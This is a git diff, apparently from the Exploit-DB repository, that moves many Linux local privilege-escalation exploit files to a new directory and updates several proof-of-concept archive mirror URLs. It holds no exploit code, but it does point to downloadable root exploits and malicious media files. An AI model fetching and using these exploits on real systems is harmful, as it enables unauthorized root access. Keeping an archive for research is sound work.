rename from platforms/linux/local/393.c rename to exploits/linux/local/393.c diff --git a/platforms/linux/local/394.c b/exploits/linux/local/394.c similarity index 100% rename from platforms/linux/local/394.c rename to exploits/linux/local/394.c diff --git a/platforms/linux/local/39433.py b/exploits/linux/local/39433.py similarity index 100% rename from platforms/linux/local/39433.py rename to exploits/linux/local/39433.py diff --git a/platforms/linux/local/39535.sh b/exploits/linux/local/39535.sh similarity index 100% rename from platforms/linux/local/39535.sh rename to exploits/linux/local/39535.sh diff --git a/platforms/linux/local/39549.txt b/exploits/linux/local/39549.txt similarity index 100% rename from platforms/linux/local/39549.txt rename to exploits/linux/local/39549.txt diff --git a/platforms/linux/local/39628.txt b/exploits/linux/local/39628.txt similarity index 100% rename from platforms/linux/local/39628.txt rename to exploits/linux/local/39628.txt diff --git a/platforms/linux/local/39673.py b/exploits/linux/local/39673.py similarity index 100% rename from platforms/linux/local/39673.py rename to exploits/linux/local/39673.py diff --git a/platforms/linux/local/39692.py b/exploits/linux/local/39692.py similarity index 100% rename from platforms/linux/local/39692.py rename to exploits/linux/local/39692.py diff --git a/platforms/linux/local/39702.rb b/exploits/linux/local/39702.rb similarity index 100% rename from platforms/linux/local/39702.rb rename to exploits/linux/local/39702.rb diff --git a/platforms/linux/local/39734.py b/exploits/linux/local/39734.py similarity index 100% rename from platforms/linux/local/39734.py rename to exploits/linux/local/39734.py diff --git a/platforms/linux/local/39764.py b/exploits/linux/local/39764.py similarity index 100% rename from platforms/linux/local/39764.py rename to exploits/linux/local/39764.py diff --git a/platforms/linux/local/39769.txt b/exploits/linux/local/39769.txt similarity index 100% rename from platforms/linux/local/39769.txt rename to exploits/linux/local/39769.txt diff --git a/platforms/linux/local/39771.txt b/exploits/linux/local/39771.txt similarity index 96% rename from platforms/linux/local/39771.txt rename to exploits/linux/local/39771.txt index 5ab3c08c9..14efa2b87 100644 --- a/platforms/linux/local/39771.txt +++ b/exploits/linux/local/39771.txt @@ -91,4 +91,4 @@ Fixed in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit? Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39771.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39771.zip \ No newline at end of file diff --git a/platforms/linux/local/39772.txt b/exploits/linux/local/39772.txt similarity index 96% rename from platforms/linux/local/39772.txt rename to exploits/linux/local/39772.txt index a5426746f..b6b92d924 100644 --- a/platforms/linux/local/39772.txt +++ b/exploits/linux/local/39772.txt @@ -125,4 +125,4 @@ Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id= Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552 -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip \ No newline at end of file diff --git a/platforms/linux/local/39810.py b/exploits/linux/local/39810.py similarity index 100% rename from platforms/linux/local/39810.py rename to exploits/linux/local/39810.py diff --git a/platforms/linux/local/39811.txt b/exploits/linux/local/39811.txt similarity index 100% rename from platforms/linux/local/39811.txt rename to exploits/linux/local/39811.txt diff --git a/platforms/linux/local/39938.rb b/exploits/linux/local/39938.rb similarity index 100% rename from platforms/linux/local/39938.rb rename to exploits/linux/local/39938.rb diff --git a/platforms/linux/local/39967.txt b/exploits/linux/local/39967.txt similarity index 100% rename from platforms/linux/local/39967.txt rename to exploits/linux/local/39967.txt diff --git a/platforms/linux/local/39992.txt b/exploits/linux/local/39992.txt similarity index 97% rename from platforms/linux/local/39992.txt rename to exploits/linux/local/39992.txt index 6f6826621..522e6652f 100644 --- a/platforms/linux/local/39992.txt +++ b/exploits/linux/local/39992.txt @@ -213,4 +213,4 @@ The page spraying is pretty primitive and racy; while it works reliably for me, Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39992.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39992.zip \ No newline at end of file diff --git a/platforms/linux/local/40.pl b/exploits/linux/local/40.pl similarity index 100% rename from platforms/linux/local/40.pl rename to exploits/linux/local/40.pl diff --git a/platforms/linux/local/40003.c b/exploits/linux/local/40003.c similarity index 100% rename from platforms/linux/local/40003.c rename to exploits/linux/local/40003.c diff --git a/platforms/linux/local/40023.py b/exploits/linux/local/40023.py similarity index 100% rename from platforms/linux/local/40023.py rename to exploits/linux/local/40023.py diff --git a/platforms/linux/local/40025.py b/exploits/linux/local/40025.py similarity index 100% rename from platforms/linux/local/40025.py rename to exploits/linux/local/40025.py diff --git a/platforms/linux/local/40054.c b/exploits/linux/local/40054.c similarity index 100% rename from platforms/linux/local/40054.c rename to exploits/linux/local/40054.c diff --git a/platforms/linux/local/40169.txt b/exploits/linux/local/40169.txt similarity index 100% rename from platforms/linux/local/40169.txt rename to exploits/linux/local/40169.txt diff --git a/platforms/linux/local/40203.py b/exploits/linux/local/40203.py similarity index 100% rename from platforms/linux/local/40203.py rename to exploits/linux/local/40203.py diff --git a/platforms/linux/local/40270.txt b/exploits/linux/local/40270.txt similarity index 86% rename from platforms/linux/local/40270.txt rename to exploits/linux/local/40270.txt index f1a8009d5..bf181c243 100644 --- a/platforms/linux/local/40270.txt +++ b/exploits/linux/local/40270.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40270.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40270.zip \ No newline at end of file diff --git a/platforms/linux/local/4028.txt b/exploits/linux/local/4028.txt similarity index 100% rename from platforms/linux/local/4028.txt rename to exploits/linux/local/4028.txt diff --git a/platforms/linux/local/40360.txt b/exploits/linux/local/40360.txt similarity index 100% rename from platforms/linux/local/40360.txt rename to exploits/linux/local/40360.txt diff --git a/platforms/linux/local/40392.py b/exploits/linux/local/40392.py similarity index 100% rename from platforms/linux/local/40392.py rename to exploits/linux/local/40392.py diff --git a/platforms/linux/local/40394.rb b/exploits/linux/local/40394.rb similarity index 100% rename from platforms/linux/local/40394.rb rename to exploits/linux/local/40394.rb diff --git a/platforms/linux/local/40450.txt b/exploits/linux/local/40450.txt similarity index 100% rename from platforms/linux/local/40450.txt rename to exploits/linux/local/40450.txt diff --git a/platforms/linux/local/40465.txt b/exploits/linux/local/40465.txt similarity index 100% rename from platforms/linux/local/40465.txt rename to exploits/linux/local/40465.txt diff --git a/platforms/linux/local/40488.txt b/exploits/linux/local/40488.txt similarity index 100% rename from platforms/linux/local/40488.txt rename to exploits/linux/local/40488.txt diff --git a/platforms/linux/local/40489.txt b/exploits/linux/local/40489.txt similarity index 95% rename from platforms/linux/local/40489.txt rename to exploits/linux/local/40489.txt index 6f1829ea6..a87502de2 100644 --- a/platforms/linux/local/40489.txt +++ b/exploits/linux/local/40489.txt @@ -39,4 +39,4 @@ root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40489.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40489.zip \ No newline at end of file diff --git a/platforms/linux/local/405.c b/exploits/linux/local/405.c similarity index 100% rename from platforms/linux/local/405.c rename to exploits/linux/local/405.c diff --git a/platforms/linux/local/40503.rb b/exploits/linux/local/40503.rb similarity index 100% rename from platforms/linux/local/40503.rb rename to exploits/linux/local/40503.rb diff --git a/platforms/linux/local/40611.c b/exploits/linux/local/40611.c similarity index 100% rename from platforms/linux/local/40611.c rename to exploits/linux/local/40611.c diff --git a/platforms/linux/local/40616.c b/exploits/linux/local/40616.c similarity index 100% rename from platforms/linux/local/40616.c rename to exploits/linux/local/40616.c diff --git a/platforms/linux/local/40634.py b/exploits/linux/local/40634.py similarity index 100% rename from platforms/linux/local/40634.py rename to exploits/linux/local/40634.py diff --git a/platforms/linux/local/40678.c b/exploits/linux/local/40678.c similarity index 100% rename from platforms/linux/local/40678.c rename to exploits/linux/local/40678.c diff --git a/platforms/linux/local/40679.sh b/exploits/linux/local/40679.sh similarity index 100% rename from platforms/linux/local/40679.sh rename to exploits/linux/local/40679.sh diff --git a/platforms/linux/local/40688.rb b/exploits/linux/local/40688.rb similarity index 100% rename from platforms/linux/local/40688.rb rename to exploits/linux/local/40688.rb diff --git a/platforms/linux/local/40759.rb b/exploits/linux/local/40759.rb similarity index 100% rename from platforms/linux/local/40759.rb rename to exploits/linux/local/40759.rb diff --git a/platforms/linux/local/40768.sh b/exploits/linux/local/40768.sh similarity index 100% rename from platforms/linux/local/40768.sh rename to exploits/linux/local/40768.sh diff --git a/platforms/linux/local/40774.sh b/exploits/linux/local/40774.sh similarity index 100% rename from platforms/linux/local/40774.sh rename to exploits/linux/local/40774.sh diff --git a/platforms/linux/local/40788.txt b/exploits/linux/local/40788.txt similarity index 100% rename from platforms/linux/local/40788.txt rename to exploits/linux/local/40788.txt diff --git a/platforms/linux/local/40789.txt b/exploits/linux/local/40789.txt similarity index 100% rename from platforms/linux/local/40789.txt rename to exploits/linux/local/40789.txt diff --git a/platforms/linux/local/40810.c b/exploits/linux/local/40810.c similarity index 100% rename from platforms/linux/local/40810.c rename to exploits/linux/local/40810.c diff --git a/platforms/linux/local/40812.c b/exploits/linux/local/40812.c similarity index 100% rename from platforms/linux/local/40812.c rename to exploits/linux/local/40812.c diff --git a/platforms/linux/local/40838.c b/exploits/linux/local/40838.c similarity index 100% rename from platforms/linux/local/40838.c rename to exploits/linux/local/40838.c diff --git a/platforms/linux/local/40839.c b/exploits/linux/local/40839.c similarity index 100% rename from platforms/linux/local/40839.c rename to exploits/linux/local/40839.c diff --git a/platforms/linux/local/40847.cpp b/exploits/linux/local/40847.cpp similarity index 100% rename from platforms/linux/local/40847.cpp rename to exploits/linux/local/40847.cpp diff --git a/platforms/linux/local/40921.sh b/exploits/linux/local/40921.sh similarity index 100% rename from platforms/linux/local/40921.sh rename to exploits/linux/local/40921.sh diff --git a/platforms/linux/local/40936.html b/exploits/linux/local/40936.html similarity index 97% rename from platforms/linux/local/40936.html rename to exploits/linux/local/40936.html index 62a8f1f54..7b602db09 100644 --- a/platforms/linux/local/40936.html +++ b/exploits/linux/local/40936.html @@ -1,6 +1,6 @@ diff --git a/platforms/linux/local/40937.txt b/exploits/linux/local/40937.txt similarity index 97% rename from platforms/linux/local/40937.txt rename to exploits/linux/local/40937.txt index 27d8b93f7..77259c73d 100644 --- a/platforms/linux/local/40937.txt +++ b/exploits/linux/local/40937.txt @@ -13,4 +13,4 @@ Source: https://donncha.is/2016/12/compromising-ubuntu-desktop/ Download: https://github.com/DonnchaC/ubuntu-apport-exploitation/archive/6ecfdf798f39fdd49b5929240d90a876c1e97ebb.zip -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40937.zip \ No newline at end of file +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40937.zip \ No newline at end of file diff --git a/platforms/linux/local/40938.py b/exploits/linux/local/40938.py similarity index 100% rename from platforms/linux/local/40938.py rename to exploits/linux/local/40938.py diff --git a/platforms/linux/local/40943.txt b/exploits/linux/local/40943.txt similarity index 97% rename from platforms/linux/local/40943.txt rename to exploits/linux/local/40943.txt index 6db8e18d9..5a1fd12c0 100644 --- a/platforms/linux/local/40943.txt +++ b/exploits/linux/local/40943.txt @@ -22,14 +22,14 @@ Today, the demos are videos instead of images. This first video shows a full, re Exploit file: gnome_calc_fedora_25_libc_2.24-3.spc (rename it to .flac to get it to work as in the video). - Download: https://security.appspot.com/security/spc/gnome_calc_fedora_25_libc_2.24-3.spc -- Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40943-1.flac +- Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40943-1.flac And this second video shows a couple of different exploitation contexts in Ubuntu 16.04 LTS, using the same exploit file for each. Again, this is showcasing the reliability that the underlying vulnerability permits. The different exploited processes (gnome-video-thumbnailer and totem) have very different heap and threading setups: - https://www.youtube.com/watch?v=wrCLoem6ggM Exploit file: xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc (rename it to .mp3 to get it to work as in the video). - Download: https://security.appspot.com/security/spc/xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc -- Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40943-2.mp3 +- Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40943-2.mp3 Impact is mixed. On Ubuntu, the faulty code is installed and on the attack surface by default, if you select the “mp3” option during install -- which I certainly always do. On Fedora, there’s a very sensible decision to split gstreamer1-plugins-bad into multiple packages, with only gstreamer1-plugins-bad-free installed by default. This limits the attack surface and does not include Game Music Emu. Of course, the gstreamer framework will happily offer to install gstreamer1-plugins-bad-free-extras, with a very nice UI, if the victim simply tries to open the relevant media file. diff --git a/platforms/linux/local/40953.sh b/exploits/linux/local/40953.sh similarity index 100% rename from platforms/linux/local/40953.sh rename to exploits/linux/local/40953.sh diff --git a/platforms/linux/local/40962.txt b/exploits/linux/local/40962.txt similarity index 96% rename from platforms/linux/local/40962.txt rename to exploits/linux/local/40962.txt index a8e742f9a..9d6d77430 100644 --- a/platforms/linux/local/40962.txt +++ b/exploits/linux/local/40962.txt @@ -23,4 +23,4 @@ yields a root shell. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40962.zip \ No newline at end of file diff --git a/platforms/linux/local/41022.txt b/exploits/linux/local/41022.txt similarity index 100% rename from platforms/linux/local/41022.txt rename to exploits/linux/local/41022.txt diff --git a/platforms/linux/local/41076.py b/exploits/linux/local/41076.py similarity index 100% rename from platforms/linux/local/41076.py rename to exploits/linux/local/41076.py diff --git a/platforms/linux/local/411.c b/exploits/linux/local/411.c similarity index 100% rename from platforms/linux/local/411.c rename to exploits/linux/local/411.c diff --git a/platforms/linux/local/41152.txt b/exploits/linux/local/41152.txt similarity index 100% rename from platforms/linux/local/41152.txt rename to exploits/linux/local/41152.txt diff --git a/platforms/linux/local/41154.sh b/exploits/linux/local/41154.sh similarity index 100% rename from platforms/linux/local/41154.sh rename to exploits/linux/local/41154.sh diff --git a/platforms/linux/local/41158.txt b/exploits/linux/local/41158.txt similarity index 100% rename from platforms/linux/local/41158.txt rename to exploits/linux/local/41158.txt diff --git a/platforms/linux/local/41171.txt b/exploits/linux/local/41171.txt similarity index 100% rename from platforms/linux/local/41171.txt rename to exploits/linux/local/41171.txt diff --git a/platforms/linux/local/41173.c b/exploits/linux/local/41173.c similarity index 100% rename from platforms/linux/local/41173.c rename to exploits/linux/local/41173.c diff --git a/platforms/linux/local/41196.txt b/exploits/linux/local/41196.txt similarity index 100% rename from platforms/linux/local/41196.txt rename to exploits/linux/local/41196.txt diff --git a/platforms/linux/local/41240.sh b/exploits/linux/local/41240.sh similarity index 100% rename from platforms/linux/local/41240.sh rename to exploits/linux/local/41240.sh diff --git a/platforms/linux/local/41356.txt b/exploits/linux/local/41356.txt similarity index 97% rename from platforms/linux/local/41356.txt rename to exploits/linux/local/41356.txt index f94013044..aec59ebaa 100644 --- a/platforms/linux/local/41356.txt +++ b/exploits/linux/local/41356.txt @@ -63,4 +63,4 @@ CPU cores. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41356.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip \ No newline at end of file diff --git a/platforms/linux/local/41435.txt b/exploits/linux/local/41435.txt similarity index 100% rename from platforms/linux/local/41435.txt rename to exploits/linux/local/41435.txt diff --git a/platforms/linux/local/41458.c b/exploits/linux/local/41458.c similarity index 100% rename from platforms/linux/local/41458.c rename to exploits/linux/local/41458.c diff --git a/platforms/linux/local/41597.txt b/exploits/linux/local/41597.txt similarity index 96% rename from platforms/linux/local/41597.txt rename to exploits/linux/local/41597.txt index ce6e633ef..c176de39c 100644 --- a/platforms/linux/local/41597.txt +++ b/exploits/linux/local/41597.txt @@ -52,4 +52,4 @@ away from the filesystem root. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41597.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41597.zip \ No newline at end of file diff --git a/platforms/linux/local/417.c b/exploits/linux/local/417.c similarity index 100% rename from platforms/linux/local/417.c rename to exploits/linux/local/417.c diff --git a/platforms/linux/local/4172.c b/exploits/linux/local/4172.c similarity index 100% rename from platforms/linux/local/4172.c rename to exploits/linux/local/4172.c diff --git a/platforms/linux/local/41760.txt b/exploits/linux/local/41760.txt similarity index 100% rename from platforms/linux/local/41760.txt rename to exploits/linux/local/41760.txt diff --git a/platforms/linux/local/41761.txt b/exploits/linux/local/41761.txt similarity index 100% rename from platforms/linux/local/41761.txt rename to exploits/linux/local/41761.txt diff --git a/platforms/linux/local/41762.txt b/exploits/linux/local/41762.txt similarity index 100% rename from platforms/linux/local/41762.txt rename to exploits/linux/local/41762.txt diff --git a/platforms/linux/local/41763.txt b/exploits/linux/local/41763.txt similarity index 100% rename from platforms/linux/local/41763.txt rename to exploits/linux/local/41763.txt diff --git a/platforms/linux/local/41764.txt b/exploits/linux/local/41764.txt similarity index 100% rename from platforms/linux/local/41764.txt rename to exploits/linux/local/41764.txt diff --git a/platforms/linux/local/41765.txt b/exploits/linux/local/41765.txt similarity index 100% rename from platforms/linux/local/41765.txt rename to exploits/linux/local/41765.txt diff --git a/platforms/linux/local/41766.txt b/exploits/linux/local/41766.txt similarity index 100% rename from platforms/linux/local/41766.txt rename to exploits/linux/local/41766.txt diff --git a/platforms/linux/local/41770.txt b/exploits/linux/local/41770.txt similarity index 100% rename from platforms/linux/local/41770.txt rename to exploits/linux/local/41770.txt diff --git a/platforms/linux/local/41786.rb b/exploits/linux/local/41786.rb similarity index 100% rename from platforms/linux/local/41786.rb rename to exploits/linux/local/41786.rb diff --git a/platforms/linux/local/41875.py b/exploits/linux/local/41875.py similarity index 100% rename from platforms/linux/local/41875.py rename to exploits/linux/local/41875.py diff --git a/platforms/linux/local/41886.c b/exploits/linux/local/41886.c similarity index 100% rename from platforms/linux/local/41886.c rename to exploits/linux/local/41886.c diff --git a/platforms/linux/local/41907.c b/exploits/linux/local/41907.c similarity index 100% rename from platforms/linux/local/41907.c rename to exploits/linux/local/41907.c diff --git a/platforms/linux/local/41923.txt b/exploits/linux/local/41923.txt similarity index 100% rename from platforms/linux/local/41923.txt rename to exploits/linux/local/41923.txt diff --git a/platforms/linux/local/41955.rb b/exploits/linux/local/41955.rb similarity index 100% rename from platforms/linux/local/41955.rb rename to exploits/linux/local/41955.rb diff --git a/platforms/linux/local/41973.txt b/exploits/linux/local/41973.txt similarity index 97% rename from platforms/linux/local/41973.txt rename to exploits/linux/local/41973.txt index 4766d18eb..83ab5b3fa 100644 --- a/platforms/linux/local/41973.txt +++ b/exploits/linux/local/41973.txt @@ -141,4 +141,4 @@ PoC Filename: xen_ptuaf_hv_shellcode_exec.tar Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41973.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41973.zip \ No newline at end of file diff --git a/platforms/linux/local/41994.c b/exploits/linux/local/41994.c similarity index 100% rename from platforms/linux/local/41994.c rename to exploits/linux/local/41994.c diff --git a/platforms/linux/local/41995.c b/exploits/linux/local/41995.c similarity index 100% rename from platforms/linux/local/41995.c rename to exploits/linux/local/41995.c diff --git a/platforms/linux/local/41999.txt b/exploits/linux/local/41999.txt similarity index 100% rename from platforms/linux/local/41999.txt rename to exploits/linux/local/41999.txt diff --git a/platforms/linux/local/42045.c b/exploits/linux/local/42045.c similarity index 100% rename from platforms/linux/local/42045.c rename to exploits/linux/local/42045.c diff --git a/platforms/linux/local/42053.c b/exploits/linux/local/42053.c similarity index 100% rename from platforms/linux/local/42053.c rename to exploits/linux/local/42053.c diff --git a/platforms/linux/local/42076.py b/exploits/linux/local/42076.py similarity index 100% rename from platforms/linux/local/42076.py rename to exploits/linux/local/42076.py diff --git a/platforms/linux/local/42183.c b/exploits/linux/local/42183.c similarity index 100% rename from platforms/linux/local/42183.c rename to exploits/linux/local/42183.c diff --git a/platforms/linux/local/42255.py b/exploits/linux/local/42255.py similarity index 100% rename from platforms/linux/local/42255.py rename to exploits/linux/local/42255.py diff --git a/platforms/linux/local/42265.py b/exploits/linux/local/42265.py similarity index 100% rename from platforms/linux/local/42265.py rename to exploits/linux/local/42265.py diff --git a/platforms/linux/local/42305.txt b/exploits/linux/local/42305.txt similarity index 100% rename from platforms/linux/local/42305.txt rename to exploits/linux/local/42305.txt diff --git a/platforms/linux/local/42356.txt b/exploits/linux/local/42356.txt similarity index 100% rename from platforms/linux/local/42356.txt rename to exploits/linux/local/42356.txt diff --git a/platforms/linux/local/42357.py b/exploits/linux/local/42357.py similarity index 100% rename from platforms/linux/local/42357.py rename to exploits/linux/local/42357.py diff --git a/platforms/linux/local/42424.py b/exploits/linux/local/42424.py similarity index 100% rename from platforms/linux/local/42424.py rename to exploits/linux/local/42424.py diff --git a/platforms/linux/local/42611.txt b/exploits/linux/local/42611.txt similarity index 95% rename from platforms/linux/local/42611.txt rename to exploits/linux/local/42611.txt index e9c7db505..dbbad848b 100644 --- a/platforms/linux/local/42611.txt +++ b/exploits/linux/local/42611.txt @@ -27,4 +27,4 @@ For how to create the malicious gems, see the attached file src.tar.gz. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42611.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42611.zip \ No newline at end of file diff --git a/platforms/linux/local/42626.c b/exploits/linux/local/42626.c similarity index 100% rename from platforms/linux/local/42626.c rename to exploits/linux/local/42626.c diff --git a/platforms/linux/local/42936.txt b/exploits/linux/local/42936.txt similarity index 100% rename from platforms/linux/local/42936.txt rename to exploits/linux/local/42936.txt diff --git a/platforms/linux/local/42937.txt b/exploits/linux/local/42937.txt similarity index 100% rename from platforms/linux/local/42937.txt rename to exploits/linux/local/42937.txt diff --git a/platforms/linux/local/43006.txt b/exploits/linux/local/43006.txt similarity index 100% rename from platforms/linux/local/43006.txt rename to exploits/linux/local/43006.txt diff --git a/platforms/linux/local/43007.txt b/exploits/linux/local/43007.txt similarity index 100% rename from platforms/linux/local/43007.txt rename to exploits/linux/local/43007.txt diff --git a/platforms/linux/local/43029.c b/exploits/linux/local/43029.c similarity index 100% rename from platforms/linux/local/43029.c rename to exploits/linux/local/43029.c diff --git a/platforms/linux/local/43127.c b/exploits/linux/local/43127.c similarity index 100% rename from platforms/linux/local/43127.c rename to exploits/linux/local/43127.c diff --git a/platforms/linux/local/434.sh b/exploits/linux/local/434.sh similarity index 100% rename from platforms/linux/local/434.sh rename to exploits/linux/local/434.sh diff --git a/platforms/linux/local/438.c b/exploits/linux/local/438.c similarity index 100% rename from platforms/linux/local/438.c rename to exploits/linux/local/438.c diff --git a/platforms/linux/local/466.pl b/exploits/linux/local/466.pl similarity index 100% rename from platforms/linux/local/466.pl rename to exploits/linux/local/466.pl diff --git a/platforms/linux/local/469.c b/exploits/linux/local/469.c similarity index 100% rename from platforms/linux/local/469.c rename to exploits/linux/local/469.c diff --git a/platforms/linux/local/4698.c b/exploits/linux/local/4698.c similarity index 100% rename from platforms/linux/local/4698.c rename to exploits/linux/local/4698.c diff --git a/platforms/linux/local/470.c b/exploits/linux/local/470.c similarity index 100% rename from platforms/linux/local/470.c rename to exploits/linux/local/470.c diff --git a/platforms/linux/local/4756.c b/exploits/linux/local/4756.c similarity index 100% rename from platforms/linux/local/4756.c rename to exploits/linux/local/4756.c diff --git a/platforms/linux/local/476.c b/exploits/linux/local/476.c similarity index 100% rename from platforms/linux/local/476.c rename to exploits/linux/local/476.c diff --git a/platforms/linux/local/479.c b/exploits/linux/local/479.c similarity index 100% rename from platforms/linux/local/479.c rename to exploits/linux/local/479.c diff --git a/platforms/linux/local/5092.c b/exploits/linux/local/5092.c similarity index 100% rename from platforms/linux/local/5092.c rename to exploits/linux/local/5092.c diff --git a/platforms/linux/local/5093.c b/exploits/linux/local/5093.c similarity index 100% rename from platforms/linux/local/5093.c rename to exploits/linux/local/5093.c diff --git a/platforms/linux/local/5167.sh b/exploits/linux/local/5167.sh similarity index 100% rename from platforms/linux/local/5167.sh rename to exploits/linux/local/5167.sh diff --git a/platforms/linux/local/5424.txt b/exploits/linux/local/5424.txt similarity index 100% rename from platforms/linux/local/5424.txt rename to exploits/linux/local/5424.txt diff --git a/platforms/linux/local/586.c b/exploits/linux/local/586.c similarity index 100% rename from platforms/linux/local/586.c rename to exploits/linux/local/586.c diff --git a/platforms/linux/local/587.c b/exploits/linux/local/587.c similarity index 100% rename from platforms/linux/local/587.c rename to exploits/linux/local/587.c diff --git a/platforms/linux/local/591.c b/exploits/linux/local/591.c similarity index 100% rename from platforms/linux/local/591.c rename to exploits/linux/local/591.c diff --git a/platforms/linux/local/600.c b/exploits/linux/local/600.c similarity index 100% rename from platforms/linux/local/600.c rename to exploits/linux/local/600.c diff --git a/platforms/linux/local/601.c b/exploits/linux/local/601.c similarity index 100% rename from platforms/linux/local/601.c rename to exploits/linux/local/601.c diff --git a/platforms/linux/local/6032.py b/exploits/linux/local/6032.py similarity index 100% rename from platforms/linux/local/6032.py rename to exploits/linux/local/6032.py diff --git a/platforms/linux/local/624.c b/exploits/linux/local/624.c similarity index 100% rename from platforms/linux/local/624.c rename to exploits/linux/local/624.c diff --git a/platforms/linux/local/6337.sh b/exploits/linux/local/6337.sh similarity index 100% rename from platforms/linux/local/6337.sh rename to exploits/linux/local/6337.sh diff --git a/platforms/linux/local/657.c b/exploits/linux/local/657.c similarity index 100% rename from platforms/linux/local/657.c rename to exploits/linux/local/657.c diff --git a/platforms/linux/local/669.c b/exploits/linux/local/669.c similarity index 100% rename from platforms/linux/local/669.c rename to exploits/linux/local/669.c diff --git a/platforms/linux/local/684.c b/exploits/linux/local/684.c similarity index 100% rename from platforms/linux/local/684.c rename to exploits/linux/local/684.c diff --git a/platforms/linux/local/6851.c b/exploits/linux/local/6851.c similarity index 100% rename from platforms/linux/local/6851.c rename to exploits/linux/local/6851.c diff --git a/platforms/linux/local/695.c b/exploits/linux/local/695.c similarity index 100% rename from platforms/linux/local/695.c rename to exploits/linux/local/695.c diff --git a/platforms/linux/local/71.c b/exploits/linux/local/71.c similarity index 100% rename from platforms/linux/local/71.c rename to exploits/linux/local/71.c diff --git a/platforms/linux/local/7177.c b/exploits/linux/local/7177.c similarity index 100% rename from platforms/linux/local/7177.c rename to exploits/linux/local/7177.c diff --git a/platforms/linux/local/718.c b/exploits/linux/local/718.c similarity index 100% rename from platforms/linux/local/718.c rename to exploits/linux/local/718.c diff --git a/platforms/linux/local/72.c b/exploits/linux/local/72.c similarity index 100% rename from platforms/linux/local/72.c rename to exploits/linux/local/72.c diff --git a/platforms/linux/local/7313.sh b/exploits/linux/local/7313.sh similarity index 100% rename from platforms/linux/local/7313.sh rename to exploits/linux/local/7313.sh diff --git a/platforms/linux/local/7393.txt b/exploits/linux/local/7393.txt similarity index 100% rename from platforms/linux/local/7393.txt rename to exploits/linux/local/7393.txt diff --git a/platforms/linux/local/741.pl b/exploits/linux/local/741.pl similarity index 100% rename from platforms/linux/local/741.pl rename to exploits/linux/local/741.pl diff --git a/platforms/linux/local/744.c b/exploits/linux/local/744.c similarity index 100% rename from platforms/linux/local/744.c rename to exploits/linux/local/744.c diff --git a/platforms/linux/local/75.c b/exploits/linux/local/75.c similarity index 100% rename from platforms/linux/local/75.c rename to exploits/linux/local/75.c diff --git a/platforms/linux/local/756.c b/exploits/linux/local/756.c similarity index 100% rename from platforms/linux/local/756.c rename to exploits/linux/local/756.c diff --git a/platforms/linux/local/7618.c b/exploits/linux/local/7618.c similarity index 100% rename from platforms/linux/local/7618.c rename to exploits/linux/local/7618.c diff --git a/platforms/linux/local/763.c b/exploits/linux/local/763.c similarity index 100% rename from platforms/linux/local/763.c rename to exploits/linux/local/763.c diff --git a/platforms/linux/local/7681.txt b/exploits/linux/local/7681.txt similarity index 100% rename from platforms/linux/local/7681.txt rename to exploits/linux/local/7681.txt diff --git a/platforms/linux/local/776.c b/exploits/linux/local/776.c similarity index 100% rename from platforms/linux/local/776.c rename to exploits/linux/local/776.c diff --git a/platforms/linux/local/778.c b/exploits/linux/local/778.c similarity index 100% rename from platforms/linux/local/778.c rename to exploits/linux/local/778.c diff --git a/platforms/linux/local/779.sh b/exploits/linux/local/779.sh similarity index 100% rename from platforms/linux/local/779.sh rename to exploits/linux/local/779.sh diff --git a/platforms/linux/local/7855.txt b/exploits/linux/local/7855.txt similarity index 77% rename from platforms/linux/local/7855.txt rename to exploits/linux/local/7855.txt index c07abbe87..bb0ef4437 100644 --- a/platforms/linux/local/7855.txt +++ b/exploits/linux/local/7855.txt @@ -3,6 +3,6 @@ PostgreSQL UDF for command execution [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz -mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7855.tar.gz (2009-lib_postgresqludf_sys_0.0.1.tar.gz) +mirror: 